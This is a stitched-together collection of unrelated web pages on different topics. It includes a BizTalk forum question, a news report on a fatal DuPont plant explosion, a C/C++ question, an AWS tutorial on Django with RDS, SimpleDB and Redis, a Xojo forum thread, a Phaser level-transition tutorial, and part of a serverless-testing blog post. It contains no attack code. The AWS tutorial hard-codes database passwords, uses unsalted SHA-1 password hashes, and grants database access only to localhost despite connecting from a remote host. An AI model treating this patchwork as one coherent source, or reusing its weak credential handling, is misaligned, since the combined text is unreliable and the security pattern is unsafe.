Now I wish to debatch the group of records returned by the adapter into individual messages, i.e., use an Envelope. An example of using Envelopes with the SQL adapter is at (). All the examples I've seen tell me to set the TNS of the Envelope schema to the same as the TNS for the generated records. However, if I do this, I'm getting errors on my receive pipeline saying "Unexpected event ("document_start") in state "processing_empty_document"."

This appears (my assumption, feel free to correct me) to be because in the envelope, the item type is set to xs:any. When the pipeline breaks out each of these elements, the item itself does not have any namespace reference, and thus fails. I can't specify the exact type for the item in the envelope schema, as I am not allowed to import an XSD whose namespace is the same as the envelope's.

If I manually add the correct namespace to the individual items in a sample file, I can successfully test the pipeline, e.g.:

<ns0:Items xmlns:ns0="http://a.b.c/Schemas/MyDatabase">
  <ns1:Item xmlns:ns1="http://a.b.c/Schemas/MyDatabase" Name="SomeSample"/>
</ns0:Items>

Can anyone see anything obviously wrong please?

Thank You,
Greg Harris
- References:
  - BT2006 Debatching from SQL Adapter
    - From: Gregory Harris
http://www.tech-archive.net/Archive/BizTalk/microsoft.public.biztalk.general/2006-08/msg00028.html
09 November 2010 23:53 [Source: ICIS news]

(adds updates throughout)

HOUSTON (ICIS)--One person died on Tuesday and another was seriously injured when a storage tank exploded at a DuPont plant in New York.

A worker employed by a mechanical contractor died, DuPont said. Another worker was injured and transported to a local hospital.

"The incident involved an empty tank that had been taken out of service and was undergoing maintenance work," DuPont said. "While workers were welding equipment connected to the tank, an explosion took place which resulted in the injuries."

DuPont added: "The incident was limited to the equipment that was being worked on and the process involved has been shut down."

The explosion occurred at 10:45 hours.

"At this point we do not believe there was any hazardous material released to the environment," DuPont said. "The site was not evacuated, and all other personnel on the site have been accounted for."

DuPont said local authorities were investigating the incident. The US Chemical Safety Board (CSB) said it had contacted DuPont and was gathering information.

The DuPont facility manufactures products used in the building industry for countertop installations and wall cladding, as well as film used for covering applications, according to news reports.

Additional reporting by Ben DuBose and Joe Kamalick

For more on DuPont visit ICIS company intelligence
http://www.icis.com/Articles/2010/11/09/9408802/One-dead-one-injured-after-DuPont-New-York-plant-blast.html
Hello, I am writing a program in C++ that also uses C sources. As this program is a pretty big project and I work on it with different people, I would like to hide the thousands of internal functions defined in the C source files, and expose to other programmers only the interfaces or wrappers I write around those functions.

To make a long story short, an example is given below, and the question is: how do I make the g() and h() functions invisible to C++ programs while leaving them visible to other C sources?

Cheader.h: declares the one "usable" function for which I write a C++ wrapper:

```c
int F(int x);
```

Csource.c:

```c
#include "Cheader.h"

/* helper functions */
int h(int x)
{
    return x * x;
}

int g(int x)
{
    return -x / x;
}

/* exported function */
int F(int x)
{
    return h(x) + g(x);
}
```

My C++ wrapper header:

```cpp
extern "C" {
#include "Cheader.h"
}

int Fpp(int x)
{
    return F(x);
}
```
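For reference, the usual C-side tool here is internal linkage (this sketch is my addition, not part of the question): marking a function `static` makes it invisible to every other translation unit, C and C++ alike. Note that this only fits helpers used within a single .c file; if the helpers must be shared across several C sources, the common convention is instead to declare them in a private header that is simply not shipped to the C++ consumers.

```c
#include <assert.h>  /* used by the checks below */

/* Csource.c -- single-file variant of the poster's example.
 * `static` gives h() and g() internal linkage, so no other
 * translation unit can link against them; only F() is exported. */
static int h(int x) { return x * x; }
static int g(int x) { return -x / x; }

/* exported function, declared in Cheader.h */
int F(int x) { return h(x) + g(x); }
```

With this arrangement, a C++ file that declares `h` or `g` itself will fail to link, while `F` remains callable through the `extern "C"` wrapper.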
http://www.gamedev.net/topic/645883-how-to-hide-global-functions-from-c-files-in-c-program/
By Reza Lotun, AWS Community Developer

Modern Web applications often employ a variety of datastores in their design to support different application requirements. This article takes you through a whirlwind tour of setting up an Amazon Elastic Compute Cloud (Amazon EC2) instance with a Django installation, ready to interface with three varieties of datastores: MySQL using Amazon Relational Database Service (Amazon RDS), Amazon SimpleDB, and Redis hosted on Amazon EC2 backed by Amazon Elastic Block Store (Amazon EBS). After reading this article, you should be able to incorporate any or all of these stores into your own application.

Introduction

So, you want to build a complex Web application? What does that mean, and how is this article different from any other of the thousands of articles that revolve around the time-tested Linux, Apache, MySQL, Python/Perl/PHP/etc. (LAMP) approach? Modern Web applications such as Twitter or Facebook employ "killer features": social networks, support for huge user bases, and real-time elements like chat. Although you may not be looking to build a service operating at the massive scale these sites offer, it is often useful to design your architecture in a way that can incorporate similar concepts. The goal is to maximize flexibility by using the right datastores for the job. The beauty of using Amazon Web Services (AWS) is that your application does not have to conform to a rigid architecture. You can take what you'd like from the following examples and adapt them to your own needs. The basic mantra you'll be adopting, though, is "why choose one?" You'll be using all three!

The following isn't meant to be a polemic that alternative, nonrelational datastores are the be-all and end-all. On the contrary, this article makes the point that each datastore has specific strengths and weaknesses. This article presents each datastore in an area that highlights its strength and shows you how to leverage it in a Python setting.
It also shows that AWS offers all the building blocks you need to incorporate any sort of datastore into your architecture. You'll learn about:

- MySQL. Using Amazon RDS, you can have a managed MySQL installation in which you have full control over the machine type and storage it uses. With a few application programming interface (API) calls, you can scale resources up or down as you require. MySQL and other relational databases excel at storing highly structured data that need to be modified in a transactional way. Also, you can take advantage of the plethora of Django applications that already exist to add functionality to your application.
- Amazon SimpleDB. Amazon SimpleDB is an example of a distributed key-value store. It is specifically designed for high scalability and is intended as a store for small pieces of indexable data, or rather metadata. Unlike MySQL, Amazon SimpleDB is schema-less, and operations on it are eventually consistent. MySQL and Amazon SimpleDB are completely different beasts: two tools that solve very different problems. You'll be using Amazon SimpleDB to store user account information.
- Redis. Another key-value store, Redis is similar to memcached in its ease of use and speed. Unlike memcached, it supports varying levels of persistence and advanced atomic operations on data structures such as lists, sets, and ordered sets. Some applications for Redis include a fast persistent session back end for Django, a real-time statistics tracker, and a URL shortener service. Although Redis is something you would host yourself on Amazon EC2, this article shows you how best to do it by backing its persistence store with an Amazon EBS partition.

Note: Notice that Amazon SimpleDB is "eventually consistent." What does that mean, exactly? Without getting into too much detail, it's important to understand one fact about storing data on Amazon SimpleDB: your data are spread across many machines.
The basic problem, then, is this: if you make a write to one machine, does the "knowledge" of that write propagate instantaneously to all other machines? Intuitively, you would say no: some amount of time has to pass before all copies of your data on multiple machines are "consistent" in some way. Although Amazon SimpleDB is eventually consistent (that is, you usually have to wait on the order of seconds for a read issued immediately after a change to reflect the previous write), a new feature on reads has just been introduced, allowing consistent reads. What this means is that you can issue a read, and the result will block until all writes affecting the data that are read propagate. This functionality can be useful in some situations, as you'll see later.

Two Hats, One Head

Okay, enough philosophizing; time for some code. A lot of people who venture into cloud computing platforms such as AWS come from a mixed background of development and operations. The lines between these two areas are blurring, but it's still useful to make a distinction between them. On the development side, you'll wear your software engineering hat and think in terms of architecture and algorithms, systems, data flow, and requirements and test. At this level of abstraction, you'll be working mostly at the framework level and your architecture. On the operations side, you often think in terms of deployments, servers, and metrics. You have code that you need to put onto machines. You have tools and other systems that need to monitor those machines. There are issues of maintenance and performance measuring, as well as load testing. Another requirement is thinking of failure: you have to plan for it to happen rather than be surprised when it does. This article touches on both of these areas. As you can imagine, both influence each other in a tight feedback loop. You'll wear two hats and touch on two different toolsets when dealing with the following ideas.
The tools in your arsenal will be:

- Development: Django, a popular Python-based Web framework
- Operations: Boto, a Python interface to the AWS APIs, and Fabric, a tool for scripting remote server tasks

Installation and Setup

This article assumes that you have a working Python and Django environment, with easy_install or pip available. If not, please consult the relevant documentation to set up one of these two packages (preferably pip). Installation of Boto and Fabric is simple (if you're using easy_install, replace pip install with easy_install):

```shell
$ pip install boto
$ pip install fabric
```

Assume that your AWS access key and secret key are available as environment variables:

```shell
$ export AWS_ACCESS_KEY_ID=YOUR_ACCESS_KEY
$ export AWS_SECRET_KEY=YOUR_SECRET
```

Note: It's important never to give away your secret key. Keep it safe; try not to hard-code it into any source files. There are tools to mitigate this risk slightly. Use them: you won't regret it.

Environment

This article assumes that you're running on Amazon EC2 to take advantage of lower latency and all the free bandwidth within the cloud. Launch an Amazon EC2 instance on which to run your Django and Redis installation. You'll be using Alestic's Ubuntu 9.10 32-bit Amazon Machine Image (AMI) ami-bb709dd2, the default security group, and an existing key denoted by "key."

You collect all of your operations steps in a fabfile. A fabfile is Fabric's way of collecting a number of commands. It starts to become really useful when you're executing these commands over many servers, but for now, just stick your Boto commands in there. You might find it useful to adopt the same approach in any of your Python projects on AWS: a fabfile with routines to deploy code and manage servers. To start, save the following code into a file called fabfile.py:

```python
import sys
import time
import boto

AMI = 'ami-bb709dd2'

def launch_ec2_instance():
    c = boto.connect_ec2()
    # get image corresponding to this AMI
    image = c.get_image(AMI)
    print 'Launching EC2 instance ...'
    # launch an instance using this image, key and security groups
    # by default this will be an m1.small instance
    res = image.run(key_name='key', security_groups=['default'])
    print res.instances[0].update()
    instance = None
    while True:
        print '.',
        sys.stdout.flush()
        dns = res.instances[0].dns_name
        if dns:
            instance = res.instances[0]
            break
        time.sleep(5.0)
        res.instances[0].update()
    print 'Instance started. Public DNS: ', instance.dns_name
```

You've defined a Fabric command called launch_ec2_instance, which is simply a function. To run it, use the following:

```shell
$ fab launch_ec2_instance
Launching EC2 instance...
u'pending'
. . .
Instance started. Public DNS: ec2-72-44-40-153.z-2.compute-1.amazonaws.com

Done.
```

You now have an Amazon EC2 instance started that you can access over SSH using your key. Do that using Fabric. Add the following code to your fabfile.py:

```python
from fabric.api import env, sudo

# this should be a path to your SSH key for the EC2 instance
key_path = '/home/me/keys/key'

def live():
    # DNS entry of our instance
    env.hosts = ['ec2-72-44-40-153.z-2.compute-1.amazonaws.com']
    env.user = 'ubuntu'
    env.key_filename = key_path

def setup_packages():
    sudo('apt-get -y update')
    sudo('apt-get -y dist-upgrade')
    sudo('apt-get install -y python python-django')
```

You've now defined two commands: one to define your "live environment" and one to execute a series of commands that update your instance to the newest software and install Django. If you had development and staging environments, you would add corresponding functions for those as well. To execute the setup on your live environment, use:

```shell
$ fab live setup_packages
```

Fabric runs the list of commands in sequence. The live command simply defines a list of machines to run subsequent commands over. By adding to your list of instances, you can code one task once and have it executed over many machines. Throughout the rest of this article, you'll be developing locally and deploying your code to the instance.
For example, you can have a code repository with a clone on your instance, and the deployment step could simply be a Fabric command that updates to the latest code on the remote instance and restarts your server. Now that you have your basic environment, you can set up your MySQL database.

Setting Up Amazon RDS

Although you have the option of running MySQL yourself on Amazon EC2 with Amazon EBS, Amazon RDS offers you the ability to let Amazon do all the heavy lifting and management for you. You'll use an Amazon RDS back end for a Django project. An Amazon RDS instance is like an Amazon EC2 instance, except that its sole purpose is to run MySQL.

```python
def initialize_db():
    """
    Initializes a one-time RDS instance.
    This should only be a one-time call.
    """
    rds = boto.connect_rds()
    sg = rds.create_dbsecurity_group('dbsg', 'My database security group.')
    groups = rds.get_all_dbsecurity_groups()
    print 'All database security groups: ', groups
    ec2 = boto.connect_ec2()
    ec2_groups = ec2.get_all_security_groups(['default'])
    for g in ec2_groups:
        sg.authorize(ec2_group=g)
    pg = rds.create_parameter_group(name='dbparamgrp',
                                    description='My DB parameter group.')
    inst = rds.create_dbinstance(id='dbid',
                                 allocated_storage=10,
                                 instance_class='db.m1.small',
                                 master_username='data_muncher',
                                 master_password='mysecretpassword',
                                 param_group='dbparamgrp',
                                 security_groups=['dbsg'])
    print 'Launching instance...'
    time.sleep(5)

def db_status():
    rds = boto.connect_rds()
    rs = rds.get_all_dbinstances()
    if rs:
        for inst in rs:
            print 'DB instance %s, status: %s, endpoint: %s' % (
                inst.id, inst.status, inst.endpoint)
    else:
        print 'No RDS instances.'
```

The first command spawns a small Amazon RDS instance with 10 GB of disk capacity from scratch. Notice that there are three steps:

- Create a database security group. Here, your security group has a name and a description. These are important concepts and allow you to restrict access to your database instances, either to specific IP addresses, IP ranges, or other Amazon EC2 groups. You've decided to allow the default Amazon EC2 group to connect to this instance.
- Create a parameter group. This is an abstraction of the mysql.conf file.
- Create an Amazon RDS instance. Spawn the actual Amazon RDS instance with a given ID, resources, configuration, and user options.

Now, you can run it:

```shell
$ fab initialize_db
Launching instance...

Done.
```

You've begun the process of launching the instance. It takes a few seconds to a few minutes, although you can check the progress manually by running the status command:

```shell
$ fab db_status
DB instance dbid, status: creating, endpoint: None

Done.

$ fab db_status
DB instance dbid, status: available, endpoint: (u'dbid.cuhbotbit2pb.us-east-1.rds.amazonaws.com', 3306)

Done.
```

Your Amazon RDS instance has started! You have the full Domain Name System (DNS) entry for it, and it's ready to accept data. Before you can do anything, however, you need to create the actual MySQL databases, which you can do from the MySQL command-line client:

```shell
$ mysql -u root -h dbid.cuhbotbit2pb.us-east-1.rds.amazonaws.com -p
```

```sql
CREATE DATABASE dbname;
GRANT ALL ON dbname.* TO 'dbuser'@'localhost' IDENTIFIED BY 'mypass';
```

Now that your MySQL environment has been completely initialized, you can tell Django to start using it by editing your settings.py file:

```python
DATABASE_ENGINE = 'mysql'
DATABASE_NAME = 'dbname'
DATABASE_USER = 'dbuser'
DATABASE_PASSWORD = 'mypass'
DATABASE_HOST = 'dbid.cuhbotbit2pb.us-east-1.rds.amazonaws.com'
DATABASE_PORT = ''  # Set to empty string for default.
```

At this point, you can run a complete Django installation:

```shell
$ python manage.py syncdb
```

Although you now have code to reproduce launching your Amazon RDS instance, you can add other tools to your fabfile to aid in administration. One such tool is CloudWatch, Amazon's metrics API, which often gets bundled with certain Web services.
Luckily, Amazon RDS is one of them. Here's an example plug-in to use CloudWatch with Amazon RDS:

```python
from datetime import datetime, timedelta

def get_cpu_stats():
    c = boto.connect_cloudwatch()
    end = datetime.now()
    start = end - timedelta(days=4)
    data = c.get_metric_statistics(60, start, end,
                                   'CPUUtilization', 'AWS/RDS', ['Average'])
    points = [(d['Average'], d['Timestamp'])
              for d in sorted(data, key=lambda x: x['Timestamp'])]
    print '\nCPU utilization on average for each of the past 20 minutes: '
    for p in points[-20:]:
        av, ts = p
        print '\tCPU: %.2s\t\t%s' % (av, ts)
```

Running this plug-in would produce:

```shell
$ fab get_cpu_stats

CPU utilization on average for each of the past 20 minutes:
    CPU: 10    2010-05-25T23:05:00Z
    ...
    CPU: 13    2010-05-25T23:31:00Z

Done.
```

Next, you can integrate a completely different datastore into your Django setup, allowing you to introduce an extra dimension of scalability.

Setting Up Amazon SimpleDB

Amazon SimpleDB is a key-value datastore. It was designed to be scalable and redundant, which makes it particularly useful for applications involving heavy writes of small pieces of indexable data. This makes it particularly suited to storing metadata rather than the full data itself. For example, say that you have multiple client implementations of a product that exist on the Web, desktop, and mobile devices. To implement lightweight user accounts, it might be useful to offload authentication data and other lightweight metadata about user accounts, such as user name, password hashes, creation time, and last updated time, onto a system like Amazon SimpleDB. In this example, you'll do just that, allowing you to implement an alternative authentication back end on Django. One thing to note about Amazon SimpleDB is its terminology and structure. At the top level, you have domains. Think of domains as namespaces with specific limits on size. Users are allowed 100 domains to name and store data as they please. Within these domains, data are stored in items.
Items have an item name and attribute-to-value mappings. More than one value can be associated with an attribute. Think of Amazon SimpleDB as a sort of large distributed hash map or dictionary. One of the limits of Amazon SimpleDB is that domains can only be 10 GB. Also, keep in mind that operations on different domains interact with different servers within the Amazon SimpleDB system. You'll use a trick that those who've used memcached are familiar with: using a set of domains to store data. If you have N domains, say, 16, you'll take a hash of the item name to get a 32-bit number, and take the modulus of that by 16 to get the domain for that item.

Look at an example of how Amazon SimpleDB could work by implementing an authentication back end for Django. Although Django comes packaged with a robust model back end intended for use over a relational database like MySQL, you'll do it over Amazon SimpleDB. Why? Perhaps you have a variety of clients, such as mobile devices, desktop applications, and Web users, who routinely authenticate into your system or create accounts. That's a lot of writes that you might want to parallelize as much as possible. Also, because this is highly sensitive data, you want it available and redundantly stored.

To begin, create those 16 domains. You can modify this number to suit your needs. Again, stick this initialization code in your fabfile:

```python
NUM_USER_DOMAINS = 16

def create_user_domains():
    conn = boto.connect_sdb()
    domain_name_template = 'user_%s'
    for i in xrange(NUM_USER_DOMAINS):
        name = domain_name_template % str(i).zfill(3)
        dom = conn.create_domain(name)
        print 'Created ', dom
```

Domain creation is idempotent, meaning that you can safely run this command as many times as you want without affecting already-created domains. Now that you have your domains, you can implement a Django authentication back end:

```python
"""
auth.py

Custom authentication backend that delegates authentication
to accounts stored in SimpleDB.
"""
import hashlib

import boto
from django.conf import settings
from django.contrib.auth.models import User

NUM_USER_DOMAINS = 16

sdb_conn = boto.connect_sdb()

# domain_map will be a map of domain number to domain
domain_map = {}
for i in xrange(NUM_USER_DOMAINS):
    domain_name = 'user_%s' % str(i).zfill(3)
    domain_map[i] = sdb_conn.get_domain(domain_name)

def get_domain(username):
    # prepend username with formatter string
    user_hash = '!u:%s' % username
    # use Python hash, since it's fast (caution: the built-in string
    # hash is not guaranteed stable across interpreters; for buckets
    # that must survive process restarts, prefer a fixed digest)
    bucket = hash(user_hash) % NUM_USER_DOMAINS
    return domain_map[bucket]

class SimpleDBBackend(object):

    def authenticate(self, username=None, password=None):
        if not username or not password:
            return None
        dom = get_domain(username)
        user_entry = dom.get_item(username)
        if user_entry is None:
            # the user doesn't exist
            return None
        # you'll probably also want to store a salt with the
        # password hash
        phash = hashlib.sha1(password).hexdigest()
        # assume we have an attribute 'pass' on the item which
        # maps to password hashes
        stored_phash = user_entry.get('pass', '')
        if phash == stored_phash:
            # valid password
            try:
                user = User.objects.get(username=username)
            except User.DoesNotExist:
                # create a new user object
                user = User(username=username, password='empty')
                user.save()
            return user
        else:
            return None

    def get_user(self, user_id):
        try:
            return User.objects.get(pk=user_id)
        except User.DoesNotExist:
            return None
```

Next, edit your Django settings.py file:

```python
AUTHENTICATION_BACKENDS = (
    'mydjangoproject.auth.SimpleDBBackend',
    'django.contrib.auth.backends.ModelBackend',
)
```

This configuration first uses your Amazon SimpleDB back end to authenticate users, and then falls back on the built-in Django ModelBackend to deal with user permissions. Of course, you can do everything in Amazon SimpleDB as well by expanding the SimpleDBBackend: it's up to you.

Setting Up Redis on Amazon EBS

Redis is an advanced key-value store, better thought of as a data structure server.
Redis excels at use cases that involve many quick operations where it would also be nice to have some persistence. Though it exists as a separate software package, perhaps the best way to deploy it on Amazon EC2 is to have its persistence layer hosted on Amazon EBS.

Note: For detailed information on setting up and configuring Redis, see Simon Willison's Redis tutorial.

Think of Amazon EBS as a mountable disk partition. The beauty of it is that, unlike local Amazon EC2 instance storage, you won't lose the data when the instance is terminated. You can also periodically take snapshots of your Amazon EBS partition and store them on Amazon Simple Storage Service (Amazon S3). So, begin by creating a 10-GB Amazon EBS volume and attaching it to /dev/sdh on your Amazon EC2 instance. You can then mount this volume (under /volume) and start saving data on it:

```python
def create_ebs_volume():
    c = boto.connect_ec2()
    reservations = c.get_all_instances()
    # since we only have one instance this will do
    instance = reservations[0].instances[0]
    # create the EBS volume in the same zone where our instance lives
    volume = c.create_volume(10, instance.placement)
    print volume.attach(instance.id, '/dev/sdh')

def mount_ebs_volume():
    # assumes the volume has already been formatted (e.g. mkfs.ext3)
    sudo('mkdir -p /volume')
    sudo('mount -t ext3 /dev/sdh /volume')
```

Any time your instance is terminated, the persistent side of Redis will always be available for the next instance you launch. This is especially useful if your Redis instance crashes and needs to be quickly recreated, or when the resources used need to be vertically scaled up to a more powerful instance.

Conclusion

This article demonstrated how you would work with various datastores on AWS. There are a lot of them to choose from, but each has a potential place in your application stack. Using Boto and Fabric, you saw how you could reuse and save your configuration steps, replaying them in the future. Also, this article showed how a tool like Fabric (combined with Boto) can allow you to manage all your instances on Amazon EC2.
Given a Django application, you learned how you can get started using Amazon SimpleDB to implement user accounts. Even using a NoSQL-type datastore like Redis is possible on Amazon EC2, especially when used in conjunction with Amazon EBS.

About the Author

Reza Lotun lives in London and spends his time architecting and developing the back-end systems for TweetDeck, as well as contributing code to Boto. You can follow him on Twitter at @rlotun.
http://aws.amazon.com/articles/Amazon-EC2/3997
You can create classes inside of a module, which gives you your own kind of namespace, amongst other things. Anyone have any tips for best practices on this? When do you put classes inside of a module? What do you use them for?

I don’t do this, only because, if you do, you can’t make the module external to the project. Otherwise, for examples of where this is done, see the MacOSLib project, among others. One advantage is that the Module gives you a place to put common properties, constants, and methods that all the embedded classes can use.

One advantage of putting a class into a module is that protected and private methods, properties, etc. of the module can be accessed by the class.

I went through a phase of doing just this, but like Kem says, it becomes very complicated once you want to have the objects external, not to mention I ran into issues with code editor ‘suggestions’ and enums in classes that are in modules.

Usually when I distribute code as free open source to other users. It just makes things easier for users when everything is wrapped into one single file that can easily be imported.

The feedback request that gets the #1 position in my top cases (and is awarded the most points)… <>… External Module Support. It will be a huge time saver if modules that contain classes can be made external.

This one is pretty big for us. I’ve added it to my top cases. Currently #44.

One thing I don’t like is that you can’t encrypt an entire module. So you can put private methods inside a module, but there’s no way to guarantee the class doesn’t leave the module.

I’d love to support external modules with contents. I’ve actually worked on it several times over the past 5+ years with other engineers, starting with Aaron way back when.
Without spending a week detailing why it’s so danged hard to do, I can just say that it’s a real bugbear to solve.

Interesting! More thoughts?

I’ve added it to my top cases too.

Just today I spent a lot of time trying to share a module among a few projects. The only way I found is to use symlinks. If you use SVN, you can check them into SVN subprojects, which you can use to do this.
https://forum.xojo.com/t/best-practices-classes-inside-of-a-module/12085
My last article turned out to be a bit of a niche topic, so I decided to try my hand at something a little more mainstream. Though we'll still be discussing Phaser (gotta monopolize that niche!), you don't need to read the previous article to follow along with this one.

Today we're going to take a look at how we can implement Spelunky-inspired level transitions in Phaser. You can see the finished product in the live demo and you can find the source code over on Github. We'll start by reviewing the effect and learning a bit about scene events and transitions, then jump into the implementation.

The concept

Before we get into the weeds, let's review the effect that we're looking to achieve. If you haven't played Spelunky before (you really should), I've included a video for reference:

Each level starts with a completely blank, black screen, which immediately reveals the entire screen using a pinhole transition. The transition doesn't start from the centre of the screen; instead, the transition is positioned on the player's character to centre your attention there. Exit transitions do the same in reverse, filling the screen with darkness around the player. Let's dig into how we can replicate this effect.

Update Nov 26, 2020 — Here is a preview of the final result:

Scene events

There are many events built into Phaser that are triggered during the lifecycle of a Scene and give you a lot of control. For example, if you're a plugin author, you might use the boot event to hook into the boot sequence of a Scene. Or you may want to do some cleanup when your scene is destroyed or put to sleep. For our purposes, we'll be using the create event to know when our level is ready to be played. You can listen to events from within your scene like this:

```javascript
this.events.on('create', fn);
```

I prefer to use the provided namespaced constants:

```javascript
this.events.on(Phaser.Scenes.Events.CREATE, fn);
```

Refer to the documentation for more information on Scene events.
Scene transitions

For this effect, we're going to use Scene transitions, which allow us to smoothly move from one scene to another. We can control exactly how this transition behaves by specifying a configuration object. If you've ever worked with tweens then you'll feel right at home, as there are similarities between them. Transitions can be started by invoking the Scene plugin:

```javascript
this.scene.transition({
    // Configuration options
});
```

Similar to Scene events, there are corresponding events for the transition lifecycle. These events can be subscribed to directly on the scene. We'll be using the out event to know when a transition is taking place.

```javascript
this.events.on(Phaser.Scenes.Events.TRANSITION_OUT, fn);
```

The arguments for transition event handlers subtly change from event to event. Refer to the documentation for details.

Putting it all together

The first step is to create an empty base class. It is not strictly necessary to create a separate class, but doing so will help isolate the code and make reusing it across levels easier. For now, just extend this bare scene; we'll flesh it out as we go along.

```javascript
class SceneTransition extends Phaser.Scene {
    // TODO
}

class LevelScene extends SceneTransition {}
```

All your base

Now that we have our classes in place, we can begin filling them out. Start by using the Graphics object to create a circle and centre it in the scene. The circle should be as large as possible while still being contained within the scene, otherwise the graphic will be cropped later on. This also helps minimize artifacts from appearing along the edges during scaling.

```javascript
const maskShape = new Phaser.Geom.Circle(
    this.sys.game.config.width / 2,
    this.sys.game.config.height / 2,
    this.sys.game.config.height / 2
);

const maskGfx = this.add.graphics()
    .setDefaultStyles({
        fillStyle: {
            color: 0xffffff,
        }
    })
    .fillCircleShape(maskShape)
;
```

You should end up with the following:

Next we're going to convert the mask graphic to a texture and add that to the scene as an image.
We don't want the mask graphic itself to be visible in the final result, so make sure to remove the fill.

```javascript
// ...
const maskGfx = this.add.graphics()
    .fillCircleShape(maskShape)
    .generateTexture('mask')
;

this.mask = this.add.image(0, 0, 'mask')
    .setPosition(
        this.sys.game.config.width / 2,
        this.sys.game.config.height / 2,
    )
;
```

You should now be back to a blank scene. Finally, we apply the mask to the camera.

```javascript
this.cameras.main.setMask(
    new Phaser.Display.Masks.BitmapMask(this, this.mask)
);
```

Creating the level

We're not going to spend much time setting up the level itself. The only requirement is that you extend the base class we created and include a key. Get creative!

```javascript
import SceneTransition from './SceneTransition';

export default class LevelOne extends SceneTransition {
    constructor () {
        super({
            key: 'ONE',
        });
    }

    preload () {
        this.load.image('background_one', '');
    }

    create () {
        super.create();

        this.add.image(0, 0, 'background_one')
            .setOrigin(0, 0)
            .setDisplaySize(
                this.sys.game.config.width,
                this.sys.game.config.height
            )
        ;
    }
}
```

You should now see something similar to this:

Setting up the events

Returning to the base class, we need to record two values. The first will be the minimum scale of the mask; the second is the maximum.

```javascript
const MASK_MIN_SCALE = 0;
const MASK_MAX_SCALE = 2;
```

The minimum value is fairly straightforward: to create a seamless transition, we need the mask to shrink completely. The maximum is a little more tricky and will depend on the aspect ratio of your game and what shape you use for your mask. Play around with this value until you're confident it does the job. In my case, my mask needs to be twice its initial scale to completely clear the outside of the scene.

Next we can (finally) leverage those events from earlier. When a transition is started, we want to animate the mask from its maximum scale to its minimum. It would also be a nice touch to have the action paused to prevent enemies from attacking the player, so let's add that in.
```js
this.events.on(Phaser.Scenes.Events.TRANSITION_OUT, () => {
    this.scene.pause();

    const propertyConfig = {
        ease: 'Expo.easeInOut',
        from: MASK_MAX_SCALE,
        start: MASK_MAX_SCALE,
        to: MASK_MIN_SCALE,
    };

    this.tweens.add({
        duration: 2500,
        scaleX: propertyConfig,
        scaleY: propertyConfig,
        targets: this.mask,
    });
});
```

Once the next scene is ready, we want to run the animation in reverse to complete the loop. There are a few changes between this animation and the last that are worth discussing, primarily around timing. The first change is the duration of the animation; it has been roughly halved in order to get the player back into the action faster. You may have also noticed the addition of the delay property. In my testing, I found that the animation can look a bit off if it reverses too quickly, so a small pause has been added to create a sense of anticipation.

```js
this.events.on(Phaser.Scenes.Events.CREATE, () => {
    const propertyConfig = {
        ease: 'Expo.easeInOut',
        from: MASK_MIN_SCALE,
        start: MASK_MIN_SCALE,
        to: MASK_MAX_SCALE,
    };

    this.tweens.add({
        delay: 2750,
        duration: 1500,
        scaleX: propertyConfig,
        scaleY: propertyConfig,
        targets: this.mask,
    });
});
```

## Triggering a transition

So far we have very little to show for all of this setup that we've done. Let's add a trigger to start a transition. Here we're using a pointer event in our level, but this could be triggered by anything in your game (e.g., collision with a tile, the result of a timer counting down, etc.).

```js
this.input.on('pointerdown', () => {
    this.scene.transition({
        duration: 2500,
        target: 'ONE',
    });
});
```

If you tried to trigger the transition, you may have noticed that nothing happens. This is because you cannot transition to a scene from itself. For the sake of this example, you can duplicate your level (be sure to give it a unique key) and then transition to that.

And that's it! You should now have your very own Spelunky-inspired level transition.
## Conclusion

Level transitions are a great way to add a level of immersion and polish to your game that doesn't take a whole lot of effort. Since the effect is entirely created by applying a mask to the Camera, it could easily be modified to use, say, Mario's head to replicate the effect found in New Super Mario Bros. Or, if you're feeling more adventurous (and less copyright-infringy), you could create a wholly unique sequence with subtle animation flourishes. The only limit really is your imagination.

Thank you for taking the time to join me on this adventure! I've been having a lot of fun working on these articles and I hope they come in handy for someone. If you end up using this technique in one of your games or just want to let me know what you think, leave a comment here or hit me up on Twitter.

### Discussion (4)

- Beautiful, thanks for sharing!
- Thanks, Juan! Glad you enjoyed it.
- Do you have a gif of the final result?
- I've added a gif to the beginning of the post :) Thanks for reading!
https://practicaldev-herokuapp-com.global.ssl.fastly.net/jorbascrumps/creating-spelunky-style-level-transitions-in-phaser-2ajd
One of the best optimizations we can make when adopting cloud and serverless technologies is to take advantage of asynchronous processing. Services like EventBridge, Step Functions, SNS and SQS can form the backbone of highly scalable, reliable, cost-effective and performant job processing. Cloud services like these mean we no longer have to worry about a single process going out of memory, or a spike in traffic causing critical business functions to fail when we need them most.

Adopting asynchronous architectures introduces new challenges around test automation. Nearly all automation testing is built around the idea of call-and-response synchronous processing. We call the web server and test the HTML string returned. We POST to the /widgets endpoint, receive a 200 OK response and then can GET our new widget. Tools like Selenium and Cypress aren't suited to workflows that involve asynchronous background processing. At best, you can fire an event and then poll for the eventual desired result.

While the idea of testing frameworks for asynchronous processing hasn't really hit the mainstream, there are some great articles out there. I highly recommend following the work of Sarah Hamilton and Paul Swail and their approaches to solving this problem using libraries like aws-testing-library and sls-test-tools. These approaches share some of the same drawbacks:

- They rely on an external credential or key to access the AWS account in question.
- They require a wait or sleep step to allow AWS time to process the asynchronous event.
- There's no real CI/CD integration happening. A failing test won't cause a deployment to roll back.

Read enough already? Check out my source code.
## Table of Contents

- External Credentials
- Don't Sleep
- Automatic Rollback
- Custom Resource Provider Framework for Test
- Payment Collections App
- Test Event
- Complete Event
- Provider
- Test Run
- Bonus: EventBridgeWebSocket
- Infrastructure Testing
- Next Steps

## External Credentials

When writing tests using something like aws-testing-library or sls-test-tools, we must have credentials to an AWS account that at least lets us send a few events and subscribe to or query the results in order to perform assertions. Depending on the stance of our organization about cloud access, this could be completely fine or it could be a never-gonna-happen dealbreaker. Often this kind of approach will be OK for a development environment, but it could be unlikely to fly in production. We may be restricted to running such tests in a CI/CD pipeline. That could get us past a security review, but it might also slow the feedback loop of writing tests, resulting in fewer overall tests written.

The safest way to solve this problem is to remove external access from the equation. If we run our tests from a resource within the AWS account, such as a Lambda function, then while we still need normal IAM permissions, we don't need to create any additional external roles. Tests can be run in production without violating the least-privilege principle of giving our deployment role the minimum grants required to create the resources we need.

## Don't Sleep

Sleep or wait statements are the bane of test automation. When a test fails, can we "fix" it by increasing the timeout? Does doing so reflect the normal operation of using cloud, or have we introduced some instability to our system that is now being normalized by making the tests take longer? In the end, we have to pin our sleep statement to the longest our process can possibly take or decide to be tolerant of test failures. We can mitigate this problem by using polling instead of sleep.
